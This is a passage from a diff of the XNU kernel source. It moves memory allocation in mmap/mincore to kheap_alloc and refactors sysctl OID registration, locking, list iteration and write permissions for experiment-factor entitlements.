PAGE_SIZE_64 - 1, &sum)) { + if (os_add3_overflow(file_pos, user_size, vm_map_page_size(user_map) - 1, &sum)) { return EINVAL; } @@ -850,10 +850,10 @@ bad: } KERNEL_DEBUG_CONSTANT((BSDDBG_CODE(DBG_BSD_SC_EXTENDED_INFO, SYS_mmap) | DBG_FUNC_NONE), fd, (uint32_t)(*retval), (uint32_t)user_size, error, 0); -#ifndef CONFIG_EMBEDDED +#if XNU_TARGET_OS_OSX KERNEL_DEBUG_CONSTANT((BSDDBG_CODE(DBG_BSD_SC_EXTENDED_INFO2, SYS_mmap) | DBG_FUNC_NONE), (uint32_t)(*retval >> 32), (uint32_t)(user_size >> 32), (uint32_t)(file_pos >> 32), (uint32_t)file_pos, 0); -#endif +#endif /* XNU_TARGET_OS_OSX */ return error; } @@ -877,9 +877,9 @@ msync_nocancel(__unused proc_t p, struct msync_nocancel_args *uap, __unused int3 user_map = current_map(); addr = (mach_vm_offset_t) uap->addr; size = (mach_vm_size_t) uap->len; -#ifndef 
CONFIG_EMBEDDED +#if XNU_TARGET_OS_OSX KERNEL_DEBUG_CONSTANT((BSDDBG_CODE(DBG_BSD_SC_EXTENDED_INFO, SYS_msync) | DBG_FUNC_NONE), (uint32_t)(addr >> 32), (uint32_t)(size >> 32), 0, 0, 0); -#endif +#endif /* XNU_TARGET_OS_OSX */ if (mach_vm_range_overflows(addr, size)) { return EINVAL; } @@ -1272,8 +1272,9 @@ mincore(__unused proc_t p, struct mincore_args *uap, __unused int32_t *retval) req_vec_size_pages = (end - addr) >> effective_page_shift; cur_vec_size_pages = MIN(req_vec_size_pages, (MAX_PAGE_RANGE_QUERY >> effective_page_shift)); + size_t kernel_vec_size = cur_vec_size_pages; - kernel_vec = (void*) _MALLOC(cur_vec_size_pages * sizeof(char), M_TEMP, M_WAITOK | M_ZERO); + kernel_vec = kheap_alloc(KHEAP_TEMP, kernel_vec_size, Z_WAITOK | Z_ZERO); if (kernel_vec == NULL) { return ENOMEM; @@ -1285,10 +1286,11 @@ mincore(__unused proc_t p, struct mincore_args *uap, __unused int32_t *retval) vec = uap->vec; pqueryinfo_vec_size = cur_vec_size_pages * sizeof(struct vm_page_info_basic); - info = (void*) _MALLOC(pqueryinfo_vec_size, M_TEMP, M_WAITOK); + + info = kheap_alloc(KHEAP_TEMP, pqueryinfo_vec_size, Z_WAITOK); if (info == NULL) { - FREE(kernel_vec, M_TEMP); + kheap_free(KHEAP_TEMP, kernel_vec, kernel_vec_size); return ENOMEM; } @@ -1366,8 +1368,8 @@ mincore(__unused proc_t p, struct mincore_args *uap, __unused int32_t *retval) first_addr = addr; } - FREE(kernel_vec, M_TEMP); - FREE(info, M_TEMP); + kheap_free(KHEAP_TEMP, info, pqueryinfo_vec_size); + kheap_free(KHEAP_TEMP, kernel_vec, kernel_vec_size); if (error) { return EFAULT; diff --git a/bsd/kern/kern_newsysctl.c b/bsd/kern/kern_newsysctl.c index b6765a202..481e11cbd 100644 --- a/bsd/kern/kern_newsysctl.c +++ b/bsd/kern/kern_newsysctl.c @@ -67,6 +67,7 @@ */ +#include #include #include #include @@ -77,9 +78,13 @@ #include #include +#include + #include #include +#include + #if CONFIG_MACF #include #endif @@ -89,9 +94,9 @@ #include #endif /* defined(HAS_APPLE_PAC) */ -lck_grp_t * sysctl_lock_group = NULL; 
-lck_rw_t * sysctl_geometry_lock = NULL; -lck_mtx_t * sysctl_unlocked_node_lock = NULL; +static LCK_GRP_DECLARE(sysctl_lock_group, "sysctl"); +static LCK_RW_DECLARE(sysctl_geometry_lock, &sysctl_lock_group); +static LCK_MTX_DECLARE(sysctl_unlocked_node_lock, &sysctl_lock_group); /* * Conditionally allow dtrace to see these functions for debugging purposes. @@ -135,7 +140,8 @@ int userland_sysctl(boolean_t string_is_canonical, int *name, u_int namelen, struct sysctl_req *req, size_t *retval); -struct sysctl_oid_list sysctl__children; /* root list */ +SECURITY_READ_ONLY_LATE(struct sysctl_oid_list) sysctl__children; /* root list */ +__SYSCTL_EXTENSION_NODE(); /* * Initialization of the MIB tree. @@ -143,14 +149,104 @@ struct sysctl_oid_list sysctl__children; /* root list */ * Order by number in each list. */ +static void +sysctl_register_oid_locked(struct sysctl_oid *new_oidp, + struct sysctl_oid *oidp) +{ + struct sysctl_oid_list *parent = new_oidp->oid_parent; + struct sysctl_oid_list *parent_rw = NULL; + struct sysctl_oid *p, **prevp; + + p = SLIST_FIRST(parent); + if (p && p->oid_number == OID_MUTABLE_ANCHOR) { + parent_rw = p->oid_arg1; + } + + if (oidp->oid_number == OID_AUTO) { + int n = OID_AUTO_START; + + /* + * If this oid has a number OID_AUTO, give it a number which + * is greater than any current oid. Make sure it is at least + * OID_AUTO_START to leave space for pre-assigned oid numbers. + */ + + SLIST_FOREACH_PREVPTR(p, prevp, parent, oid_link) { + if (p->oid_number >= n) { + n = p->oid_number + 1; + } + } + + if (parent_rw) { + SLIST_FOREACH_PREVPTR(p, prevp, parent_rw, oid_link) { + if (p->oid_number >= n) { + n = p->oid_number + 1; + } + } + } + + /* + * Reflect the number in an allocated OID into the template + * of the caller for sysctl_unregister_oid() compares. + */ + oidp->oid_number = new_oidp->oid_number = n; + } else { + /* + * Insert the oid into the parent's list in order. 
+ */ + SLIST_FOREACH_PREVPTR(p, prevp, parent, oid_link) { + if (oidp->oid_number == p->oid_number) { + panic("attempting to register a sysctl at previously registered slot : %d", + oidp->oid_number); + } else if (oidp->oid_number < p->oid_number) { + break; + } + } + + if (parent_rw) { + SLIST_FOREACH_PREVPTR(p, prevp, parent_rw, oid_link) { + if (oidp->oid_number == p->oid_number) { + panic("attempting to register a sysctl at previously registered slot : %d", + oidp->oid_number); + } else if (oidp->oid_number < p->oid_number) { + break; + } + } + } + } + +#if defined(HAS_APPLE_PAC) + if (oidp->oid_handler) { + /* + * Sign oid_handler address-discriminated upon installation to make it + * harder to replace with an arbitrary function pointer. Blend with + * a hash of oid_arg1 for robustness against memory corruption. + */ + oidp->oid_handler = ptrauth_auth_and_resign(oidp->oid_handler, + ptrauth_key_function_pointer, + ptrauth_function_pointer_type_discriminator(typeof(oidp->oid_handler)), + ptrauth_key_function_pointer, + ptrauth_blend_discriminator(&oidp->oid_handler, + os_hash_kernel_pointer(oidp->oid_arg1))); + } +#endif /* defined(HAS_APPLE_PAC) */ + + SLIST_NEXT(oidp, oid_link) = *prevp; + *prevp = oidp; +} + void sysctl_register_oid(struct sysctl_oid *new_oidp) { - struct sysctl_oid *oidp = NULL; - struct sysctl_oid_list *parent = new_oidp->oid_parent; - struct sysctl_oid *p; - struct sysctl_oid *q; - int n; + struct sysctl_oid *oidp; + + if (new_oidp->oid_number < OID_AUTO) { + panic("trying to register a node %p with an invalid oid_number: %d", + new_oidp, new_oidp->oid_number); + } + if (new_oidp->oid_kind & CTLFLAG_PERMANENT) { + panic("Use sysctl_register_oid_early to register permanent nodes"); + } /* * The OID can be old-style (needs copy), new style without an earlier @@ -161,10 +257,11 @@ sysctl_register_oid(struct sysctl_oid *new_oidp) if (!(new_oidp->oid_kind & CTLFLAG_OID2)) { #if __x86_64__ /* - * XXX: M_TEMP is perhaps not the most apropriate 
zone, as it + * XXX: KHEAP_DEFAULT is perhaps not the most appropriate zone, as it * XXX: will subject us to use-after-free by other consumers. */ - MALLOC(oidp, struct sysctl_oid *, sizeof(*oidp), M_TEMP, M_WAITOK | M_ZERO); + oidp = kheap_alloc(KHEAP_DEFAULT, sizeof(struct sysctl_oid), + Z_WAITOK | Z_ZERO); if (oidp == NULL) { return; /* reject: no memory */ } @@ -175,7 +272,7 @@ sysctl_register_oid(struct sysctl_oid *new_oidp) * Note: We may want to set the oid_descr to the * oid_name (or "") at some future date. */ - *oidp = *new_oidp; + memcpy(oidp, new_oidp, offsetof(struct sysctl_oid, oid_descr)); #else panic("Old style sysctl without a version number isn't supported"); #endif @@ -191,68 +288,30 @@ sysctl_register_oid(struct sysctl_oid *new_oidp) } } - /* Get the write lock to modify the geometry */ - lck_rw_lock_exclusive(sysctl_geometry_lock); - - /* - * If this oid has a number OID_AUTO, give it a number which - * is greater than any current oid. Make sure it is at least - * OID_AUTO_START to leave space for pre-assigned oid numbers. - */ - if (oidp->oid_number == OID_AUTO) { - /* First, find the highest oid in the parent list >OID_AUTO_START-1 */ - n = OID_AUTO_START; - SLIST_FOREACH(p, parent, oid_link) { - if (p->oid_number > n) { - n = p->oid_number; - } - } - oidp->oid_number = n + 1; - /* - * Reflect the number in an llocated OID into the template - * of the caller for sysctl_unregister_oid() compares. - */ - if (oidp != new_oidp) { - new_oidp->oid_number = oidp->oid_number; - } - } + lck_rw_lock_exclusive(&sysctl_geometry_lock); + sysctl_register_oid_locked(new_oidp, oidp); + lck_rw_unlock_exclusive(&sysctl_geometry_lock); +} -#if defined(HAS_APPLE_PAC) - if (oidp->oid_handler) { - /* - * Sign oid_handler address-discriminated upon installation to make it - * harder to replace with an arbitrary function pointer. Blend with - * a hash of oid_arg1 for robustness against memory corruption.
- */ - oidp->oid_handler = ptrauth_auth_and_resign(oidp->oid_handler, - ptrauth_key_function_pointer, - ptrauth_function_pointer_type_discriminator(typeof(oidp->oid_handler)), - ptrauth_key_function_pointer, - ptrauth_blend_discriminator(&oidp->oid_handler, - os_hash_kernel_pointer(oidp->oid_arg1))); - } -#endif /* defined(HAS_APPLE_PAC) */ +__startup_func +void +sysctl_register_oid_early(struct sysctl_oid *oidp) +{ + assert((oidp->oid_kind & CTLFLAG_OID2) && + (oidp->oid_kind & CTLFLAG_PERMANENT) && + oidp->oid_version == SYSCTL_OID_VERSION); + assert(startup_phase < STARTUP_SUB_SYSCTL); /* - * Insert the oid into the parent's list in order. + * Clear the flag so that callers can use sysctl_register_oid_early + * again if they wish to register their node. */ - q = NULL; - SLIST_FOREACH(p, parent, oid_link) { - if (oidp->oid_number == p->oid_number) { - panic("attempting to register a sysctl at previously registered slot : %d", oidp->oid_number); - } else if (oidp->oid_number < p->oid_number) { - break; - } - q = p; - } - if (q) { - SLIST_INSERT_AFTER(q, oidp, oid_link); - } else { - SLIST_INSERT_HEAD(parent, oidp, oid_link); + if (oidp->oid_kind & CTLFLAG_NOAUTO) { + oidp->oid_kind &= ~CTLFLAG_NOAUTO; + return; } - /* Release the write lock */ - lck_rw_unlock_exclusive(sysctl_geometry_lock); + sysctl_register_oid_locked(oidp, oidp); } void @@ -261,12 +320,20 @@ sysctl_unregister_oid(struct sysctl_oid *oidp) struct sysctl_oid *removed_oidp = NULL; /* OID removed from tree */ #if __x86_64__ struct sysctl_oid *old_oidp = NULL; /* OID compatibility copy */ -#else - struct sysctl_oid *const old_oidp = NULL; #endif + struct sysctl_oid_list *lsp; /* Get the write lock to modify the geometry */ - lck_rw_lock_exclusive(sysctl_geometry_lock); + lck_rw_lock_exclusive(&sysctl_geometry_lock); + + lsp = oidp->oid_parent; + if (SLIST_FIRST(lsp) && SLIST_FIRST(lsp)->oid_number == OID_MUTABLE_ANCHOR) { + lsp = SLIST_FIRST(lsp)->oid_arg1; + } + + if (oidp->oid_kind & 
CTLFLAG_PERMANENT) { + panic("Trying to unregister permanent sysctl %p", oidp); + } if (!(oidp->oid_kind & CTLFLAG_OID2)) { #if __x86_64__ @@ -276,13 +343,13 @@ sysctl_unregister_oid(struct sysctl_oid *oidp) * partial structure; when we find a match, we remove it * normally and free the memory. */ - SLIST_FOREACH(old_oidp, oidp->oid_parent, oid_link) { + SLIST_FOREACH(old_oidp, lsp, oid_link) { if (!memcmp(&oidp->oid_number, &old_oidp->oid_number, (offsetof(struct sysctl_oid, oid_descr) - offsetof(struct sysctl_oid, oid_number)))) { break; } } if (old_oidp != NULL) { - SLIST_REMOVE(old_oidp->oid_parent, old_oidp, sysctl_oid, oid_link); + SLIST_REMOVE(lsp, old_oidp, sysctl_oid, oid_link); removed_oidp = old_oidp; } #else @@ -293,7 +360,7 @@ sysctl_unregister_oid(struct sysctl_oid *oidp) switch (oidp->oid_version) { case SYSCTL_OID_VERSION: /* We can just remove the OID directly... */ - SLIST_REMOVE(oidp->oid_parent, oidp, sysctl_oid, oid_link); + SLIST_REMOVE(lsp, oidp, sysctl_oid, oid_link); removed_oidp = oidp; break; default: @@ -303,7 +370,7 @@ sysctl_unregister_oid(struct sysctl_oid *oidp) } #if defined(HAS_APPLE_PAC) - if (removed_oidp && removed_oidp->oid_handler && old_oidp == NULL) { + if (removed_oidp && removed_oidp->oid_handler) { /* * Revert address-discriminated signing performed by * sysctl_register_oid() (in case this oid is registered again). @@ -326,47 +393,17 @@ sysctl_unregister_oid(struct sysctl_oid *oidp) * Note: oidp could be NULL if it wasn't found. 
*/ while (removed_oidp && removed_oidp->oid_refcnt) { - lck_rw_sleep(sysctl_geometry_lock, LCK_SLEEP_EXCLUSIVE, &removed_oidp->oid_refcnt, THREAD_UNINT); + lck_rw_sleep(&sysctl_geometry_lock, LCK_SLEEP_EXCLUSIVE, + &removed_oidp->oid_refcnt, THREAD_UNINT); } /* Release the write lock */ - lck_rw_unlock_exclusive(sysctl_geometry_lock); + lck_rw_unlock_exclusive(&sysctl_geometry_lock); - if (old_oidp != NULL) { #if __x86_64__ - /* If it was allocated, free it after dropping the lock */ - FREE(old_oidp, M_TEMP); + /* If it was allocated, free it after dropping the lock */ + kheap_free(KHEAP_DEFAULT, old_oidp, sizeof(struct sysctl_oid)); #endif - } -} - -/* - * Bulk-register all the oids in a linker_set. - */ -void -sysctl_register_set(const char *set) -{ - struct sysctl_oid **oidpp, *oidp; - - LINKER_SET_FOREACH(oidpp, struct sysctl_oid **, set) { - oidp = *oidpp; - if (!(oidp->oid_kind & CTLFLAG_NOAUTO)) { - sysctl_register_oid(oidp); - } - } -} - -void -sysctl_unregister_set(const char *set) -{ - struct sysctl_oid **oidpp, *oidp; - - LINKER_SET_FOREACH(oidpp, struct sysctl_oid **, set) { - oidp = *oidpp; - if (!(oidp->oid_kind & CTLFLAG_NOAUTO)) { - sysctl_unregister_oid(oidp); - } - } } /* @@ -379,28 +416,6 @@ sysctl_register_fixed(void) } #endif -/* - * Register the kernel's oids on startup. - */ - -void -sysctl_early_init(void) -{ - /* - * Initialize the geometry lock for reading/modifying the - * sysctl tree. This is done here because IOKit registers - * some sysctl's before bsd_init() would otherwise perform - * subsystem initialization. 
- */ - - sysctl_lock_group = lck_grp_alloc_init("sysctl", NULL); - sysctl_geometry_lock = lck_rw_alloc_init(sysctl_lock_group, NULL); - sysctl_unlocked_node_lock = lck_mtx_alloc_init(sysctl_lock_group, NULL); - - sysctl_register_set("__sysctl_set"); - sysctl_load_devicetree_entries(); -} - /* * New handler interface * If the sysctl caller (user mode or kernel mode) is interested in the @@ -553,6 +568,94 @@ sysctl_io_opaque(struct sysctl_req *req, void *pValue, size_t valueSize, int *ch return error; } +/* + * SYSCTL_OID enumerators + * + * Because system OIDs are immutable, they are composed of 2 lists hanging from + * a first dummy OID_MUTABLE_ANCHOR node that has an immutable list hanging from + * its `oid_parent` field and a mutable list hanging from its oid_arg1 one. + * + * Those enumerators abstract away the implicit merging of those two lists in + * two possible order: + * - oid_number order (which will interleave both sorted lists) + * - system order which will list the immutable list first, + * and the mutable list second. 
+ */ +struct sysctl_oid_iterator { + struct sysctl_oid *a; + struct sysctl_oid *b; +}; + +static struct sysctl_oid_iterator +sysctl_oid_iterator_begin(struct sysctl_oid_list *l) +{ + struct sysctl_oid_iterator it = { }; + struct sysctl_oid *a = SLIST_FIRST(l); + + if (a == NULL) { + return it; + } + + if (a->oid_number == OID_MUTABLE_ANCHOR) { + it.a = SLIST_NEXT(a, oid_link); + it.b = SLIST_FIRST((struct sysctl_oid_list *)a->oid_arg1); + } else { + it.a = a; + } + return it; +} + +static struct sysctl_oid * +sysctl_oid_iterator_next_num_order(struct sysctl_oid_iterator *it) +{ + struct sysctl_oid *a = it->a; + struct sysctl_oid *b = it->b; + + if (a == NULL && b == NULL) { + return NULL; + } + + if (a == NULL) { + it->b = SLIST_NEXT(b, oid_link); + return b; + } + + if (b == NULL || a->oid_number <= b->oid_number) { + it->a = SLIST_NEXT(a, oid_link); + return a; + } + + it->b = SLIST_NEXT(b, oid_link); + return b; +} + +#define SYSCTL_OID_FOREACH_NUM_ORDER(oidp, l) \ + for (struct sysctl_oid_iterator it = sysctl_oid_iterator_begin(l); \ + ((oidp) = sysctl_oid_iterator_next_num_order(&it)); ) + +static struct sysctl_oid * +sysctl_oid_iterator_next_system_order(struct sysctl_oid_iterator *it) +{ + struct sysctl_oid *a = it->a; + struct sysctl_oid *b = it->b; + + if (a) { + it->a = SLIST_NEXT(a, oid_link); + return a; + } + + if (b) { + it->b = SLIST_NEXT(b, oid_link); + return b; + } + + return NULL; +} + +#define SYSCTL_OID_FOREACH_SYS_ORDER(oidp, l) \ + for (struct sysctl_oid_iterator it = sysctl_oid_iterator_begin(l); \ + ((oidp) = sysctl_oid_iterator_next_system_order(&it)); ) + /* * "Staff-functions" * @@ -599,38 +702,50 @@ sysctl_io_opaque(struct sysctl_req *req, void *pValue, size_t valueSize, int *ch STATIC void sysctl_sysctl_debug_dump_node(struct sysctl_oid_list *l, int i) { - int k; struct sysctl_oid *oidp; + struct sysctl_oid_list *lp; + const char *what; - SLIST_FOREACH(oidp, l, oid_link) { - for (k = 0; k < i; k++) { - printf(" "); + 
SYSCTL_OID_FOREACH_SYS_ORDER(oidp, l) { + switch (oidp->oid_kind & CTLTYPE) { + case CTLTYPE_NODE: + lp = oidp->oid_arg1; + what = "Node "; + if (lp && SLIST_FIRST(lp) && + SLIST_FIRST(lp)->oid_number == OID_MUTABLE_ANCHOR) { + what = "NodeExt"; + } else { + } + break; + case CTLTYPE_INT: + what = "Int "; + break; + case CTLTYPE_STRING: + what = "String "; + break; + case CTLTYPE_QUAD: + what = "Quad "; + break; + case CTLTYPE_OPAQUE: + what = "Opaque "; + break; + default: + what = "Unknown"; + break; } - printf("%d %s ", oidp->oid_number, oidp->oid_name); - - printf("%c%c%c", + printf("%*s%-3d[%c%c%c%c%c] %s %s\n", i, "", oidp->oid_number, oidp->oid_kind & CTLFLAG_LOCKED ? 'L':' ', oidp->oid_kind & CTLFLAG_RD ? 'R':' ', - oidp->oid_kind & CTLFLAG_WR ? 'W':' '); - - if (oidp->oid_handler) { - printf(" *Handler"); - } + oidp->oid_kind & CTLFLAG_WR ? 'W':' ', + oidp->oid_kind & CTLFLAG_PERMANENT ? ' ':'*', + oidp->oid_handler ? 'h' : ' ', + what, oidp->oid_name); - switch (oidp->oid_kind & CTLTYPE) { - case CTLTYPE_NODE: - printf(" Node\n"); + if ((oidp->oid_kind & CTLTYPE) == CTLTYPE_NODE) { if (!oidp->oid_handler) { - sysctl_sysctl_debug_dump_node( - oidp->oid_arg1, i + 2); + sysctl_sysctl_debug_dump_node(lp, i + 2); } - break; - case CTLTYPE_INT: printf(" Int\n"); break; - case CTLTYPE_STRING: printf(" String\n"); break; - case CTLTYPE_QUAD: printf(" Quad\n"); break; - case CTLTYPE_OPAQUE: printf(" Opaque/struct\n"); break; - default: printf("\n"); } } } @@ -656,9 +771,9 @@ STATIC int sysctl_sysctl_debug(__unused struct sysctl_oid *oidp, __unused void *arg1, __unused int arg2, __unused struct sysctl_req *req) { - lck_rw_lock_shared(sysctl_geometry_lock); + lck_rw_lock_shared(&sysctl_geometry_lock); sysctl_sysctl_debug_dump_node(&sysctl__children, 0); - lck_rw_done(sysctl_geometry_lock); + lck_rw_done(&sysctl_geometry_lock); return ENOENT; } @@ -722,7 +837,7 @@ sysctl_sysctl_name(__unused struct sysctl_oid *oidp, void *arg1, int arg2, struct sysctl_oid_list *lsp = 
&sysctl__children, *lsp2; char tempbuf[10] = {}; - lck_rw_lock_shared(sysctl_geometry_lock); + lck_rw_lock_shared(&sysctl_geometry_lock); while (namelen) { if (!lsp) { snprintf(tempbuf, sizeof(tempbuf), "%d", *name); @@ -733,7 +848,7 @@ sysctl_sysctl_name(__unused struct sysctl_oid *oidp, void *arg1, int arg2, error = SYSCTL_OUT(req, tempbuf, strlen(tempbuf)); } if (error) { - lck_rw_done(sysctl_geometry_lock); + lck_rw_done(&sysctl_geometry_lock); return error; } namelen--; @@ -741,7 +856,7 @@ sysctl_sysctl_name(__unused struct sysctl_oid *oidp, void *arg1, int arg2, continue; } lsp2 = 0; - SLIST_FOREACH(oid, lsp, oid_link) { + SYSCTL_OID_FOREACH_NUM_ORDER(oid, lsp) { if (oid->oid_number != *name) { continue; } @@ -754,7 +869,7 @@ sysctl_sysctl_name(__unused struct sysctl_oid *oidp, void *arg1, int arg2, strlen(oid->oid_name)); } if (error) { - lck_rw_done(sysctl_geometry_lock); + lck_rw_done(&sysctl_geometry_lock); return error; } @@ -774,7 +889,7 @@ sysctl_sysctl_name(__unused struct sysctl_oid *oidp, void *arg1, int arg2, } lsp = lsp2; } - lck_rw_done(sysctl_geometry_lock); + lck_rw_done(&sysctl_geometry_lock); return SYSCTL_OUT(req, "", 1); } @@ -819,7 +934,7 @@ sysctl_sysctl_next_ls(struct sysctl_oid_list *lsp, int *name, u_int namelen, struct sysctl_oid *oidp; *len = level; - SLIST_FOREACH(oidp, lsp, oid_link) { + SYSCTL_OID_FOREACH_NUM_ORDER(oidp, lsp) { *next = oidp->oid_number; *oidpp = oidp; @@ -932,9 +1047,9 @@ sysctl_sysctl_next(__unused struct sysctl_oid *oidp, void *arg1, int arg2, struct sysctl_oid_list *lsp = &sysctl__children; int newoid[CTL_MAXNAME] = {}; - lck_rw_lock_shared(sysctl_geometry_lock); + lck_rw_lock_shared(&sysctl_geometry_lock); i = sysctl_sysctl_next_ls(lsp, name, namelen, newoid, &j, 1, &oid); - lck_rw_done(sysctl_geometry_lock); + lck_rw_done(&sysctl_geometry_lock); if (i) { return ENOENT; } @@ -966,10 +1081,10 @@ SYSCTL_NODE(_sysctl, 2, next, CTLFLAG_RD | CTLFLAG_LOCKED, sysctl_sysctl_next, " STATIC int name2oid(char *name, int 
*oid, size_t *len) { - char i; + struct sysctl_oid_iterator it; struct sysctl_oid *oidp; - struct sysctl_oid_list *lsp = &sysctl__children; char *p; + char i; if (!*name) { return ENOENT; @@ -990,11 +1105,12 @@ name2oid(char *name, int *oid, size_t *len) *p = '\0'; } - oidp = SLIST_FIRST(lsp); + it = sysctl_oid_iterator_begin(&sysctl__children); + oidp = sysctl_oid_iterator_next_system_order(&it); while (oidp && *len < CTL_MAXNAME) { if (strcmp(name, oidp->oid_name)) { - oidp = SLIST_NEXT(oidp, oid_link); + oidp = sysctl_oid_iterator_next_system_order(&it); continue; } *oid++ = oidp->oid_number; @@ -1012,8 +1128,9 @@ name2oid(char *name, int *oid, size_t *len) break; } - lsp = (struct sysctl_oid_list *)oidp->oid_arg1; - oidp = SLIST_FIRST(lsp); + it = sysctl_oid_iterator_begin(oidp->oid_arg1); + oidp = sysctl_oid_iterator_next_system_order(&it); + *p = i; /* restore */ name = p + 1; for (p = name; *p && *p != '.'; p++) { @@ -1081,14 +1198,14 @@ sysctl_sysctl_name2oid(__unused struct sysctl_oid *oidp, __unused void *arg1, return ENAMETOOLONG; } - MALLOC(p, char *, req->newlen + 1, M_TEMP, M_WAITOK); + p = kheap_alloc(KHEAP_TEMP, req->newlen + 1, Z_WAITOK); if (!p) { return ENOMEM; } error = SYSCTL_IN(req, p, req->newlen); if (error) { - FREE(p, M_TEMP); + kheap_free(KHEAP_TEMP, p, req->newlen + 1); return error; } @@ -1098,11 +1215,11 @@ sysctl_sysctl_name2oid(__unused struct sysctl_oid *oidp, __unused void *arg1, * Note: We acquire and release the geometry lock here to * avoid making name2oid needlessly complex. 
*/ - lck_rw_lock_shared(sysctl_geometry_lock); + lck_rw_lock_shared(&sysctl_geometry_lock); error = name2oid(p, oid, &len); - lck_rw_done(sysctl_geometry_lock); + lck_rw_done(&sysctl_geometry_lock); - FREE(p, M_TEMP); + kheap_free(KHEAP_TEMP, p, req->newlen + 1); if (error) { return error; @@ -1160,11 +1277,13 @@ sysctl_sysctl_oidfmt(__unused struct sysctl_oid *oidp, void *arg1, int arg2, int error = ENOENT; /* default error: not found */ u_int namelen = arg2; u_int indx; + struct sysctl_oid_iterator it; struct sysctl_oid *oid; - struct sysctl_oid_list *lsp = &sysctl__children; - lck_rw_lock_shared(sysctl_geometry_lock); - oid = SLIST_FIRST(lsp); + lck_rw_lock_shared(&sysctl_geometry_lock); + + it = sysctl_oid_iterator_begin(&sysctl__children); + oid = sysctl_oid_iterator_next_system_order(&it); indx = 0; while (oid && indx < CTL_MAXNAME) { @@ -1177,8 +1296,8 @@ sysctl_sysctl_oidfmt(__unused struct sysctl_oid *oidp, void *arg1, int arg2, if (indx == namelen) { goto found; } - lsp = (struct sysctl_oid_list *)oid->oid_arg1; - oid = SLIST_FIRST(lsp); + it = sysctl_oid_iterator_begin(oid->oid_arg1); + oid = sysctl_oid_iterator_next_system_order(&it); } else { if (indx != namelen) { error = EISDIR; @@ -1187,7 +1306,7 @@ sysctl_sysctl_oidfmt(__unused struct sysctl_oid *oidp, void *arg1, int arg2, goto found; } } else { - oid = SLIST_NEXT(oid, oid_link); + oid = sysctl_oid_iterator_next_system_order(&it); } } /* Not found */ @@ -1204,7 +1323,7 @@ found: strlen(oid->oid_fmt) + 1); } err: - lck_rw_done(sysctl_geometry_lock); + lck_rw_done(&sysctl_geometry_lock); return error; } @@ -1448,25 +1567,46 @@ sysctl_new_user(struct sysctl_req *req, void *p, size_t l) return error; } +#define WRITE_EXPERIMENT_FACTORS_ENTITLEMENT "com.apple.private.write-kr-experiment-factors" +/* + * Is the current task allowed to write to experiment factors? + * tasks with the WRITE_EXPERIMENT_FACTORS_ENTITLEMENT are always allowed to write these. 
+ * In the development / debug kernel we also allow root to write them. + */ +STATIC bool +can_write_experiment_factors(__unused struct sysctl_req *req) +{ + if (IOTaskHasEntitlement(current_task(), WRITE_EXPERIMENT_FACTORS_ENTITLEMENT)) { + return true; + } +#if DEBUG || DEVELOPMENT + return !proc_suser(req->p); +#else + return false; +#endif /* DEBUG || DEVELOPMENT */ +} + /* * Traverse our tree, and find the right node, execute whatever it points * at, and return the resulting error code. */ int -sysctl_root(boolean_t from_kernel, boolean_t string_is_canonical, char *namestring, size_t namestringlen, int *name, size_t namelen, struct sysctl_req *req) +sysctl_root(boolean_t from_kernel, boolean_t string_is_canonical, + char *namestring, size_t namestringlen, + int *name, size_t namelen, struct sysctl_req *req) { u_int indx; int i; + struct sysctl_oid_iterator it; struct sysctl_oid *oid; - struct sysctl_oid_list *lsp = &sysctl__children; sysctl_handler_t oid_handler = NULL; int error; boolean_t unlocked_node_found = FALSE; boolean_t namestring_started = FALSE; /* Get the read lock on the geometry */ - lck_rw_lock_shared(sysctl_geometry_lock); + lck_rw_lock_shared(&sysctl_geometry_lock); if (string_is_canonical) { /* namestring is actually canonical, name/namelen needs to be populated */ @@ -1476,7 +1616,8 @@ sysctl_root(boolean_t from_kernel, boolean_t string_is_canonical, char *namestri } } - oid = SLIST_FIRST(lsp); + it = sysctl_oid_iterator_begin(&sysctl__children); + oid = sysctl_oid_iterator_next_system_order(&it); indx = 0; while (oid && indx < CTL_MAXNAME) { @@ -1524,8 +1665,8 @@ sysctl_root(boolean_t from_kernel, boolean_t string_is_canonical, char *namestri goto err; } - lsp = (struct sysctl_oid_list *)oid->oid_arg1; - oid = SLIST_FIRST(lsp); + it = sysctl_oid_iterator_begin(oid->oid_arg1); + oid = sysctl_oid_iterator_next_system_order(&it); } else { if (indx != namelen) { error = EISDIR; @@ -1534,7 +1675,7 @@ sysctl_root(boolean_t from_kernel, boolean_t 
string_is_canonical, char *namestri goto found; } } else { - oid = SLIST_NEXT(oid, oid_link); + oid = sysctl_oid_iterator_next_system_order(&it); } } error = ENOENT; @@ -1582,18 +1723,30 @@ found: goto err; } - /* - * This is where legacy enforcement of permissions occurs. If the - * flag does not say CTLFLAG_ANYBODY, then we prohibit anyone but - * root from writing new values down. If local enforcement happens - * at the leaf node, then it needs to be set as CTLFLAG_ANYBODY. In - * addition, if the leaf node is set this way, then in order to do - * specific enforcement, it has to be of type SYSCTL_PROC. - */ - if (!(oid->oid_kind & CTLFLAG_ANYBODY) && - req->newptr && req->p && - (error = proc_suser(req->p))) { - goto err; + if (req->newptr && req->p) { + if (oid->oid_kind & CTLFLAG_EXPERIMENT) { + /* + * Experiment factors have different permissions since they need to be + * writable by procs with WRITE_EXPERIMENT_FACTORS_ENTITLEMENT. + */ + if (!can_write_experiment_factors(req)) { + error = (EPERM); + goto err; + } + } else { + /* + * This is where legacy enforcement of permissions occurs. If the + * flag does not say CTLFLAG_ANYBODY, then we prohibit anyone but + * root from writing new values down. If local enforcement happens + * at the leaf node, then it needs to be set as CTLFLAG_ANYBODY. In + * addition, if the leaf node is set this way, then in order to do + * specific enforcement, it has to be of type SYSCTL_PROC. + */ + if (!(oid->oid_kind & CTLFLAG_ANYBODY) && + (error = proc_suser(req->p))) { + goto err; + } + } } /* @@ -1612,9 +1765,11 @@ found: * not prevent other calls into handlers or calls to manage the * geometry elsewhere from blocking... 
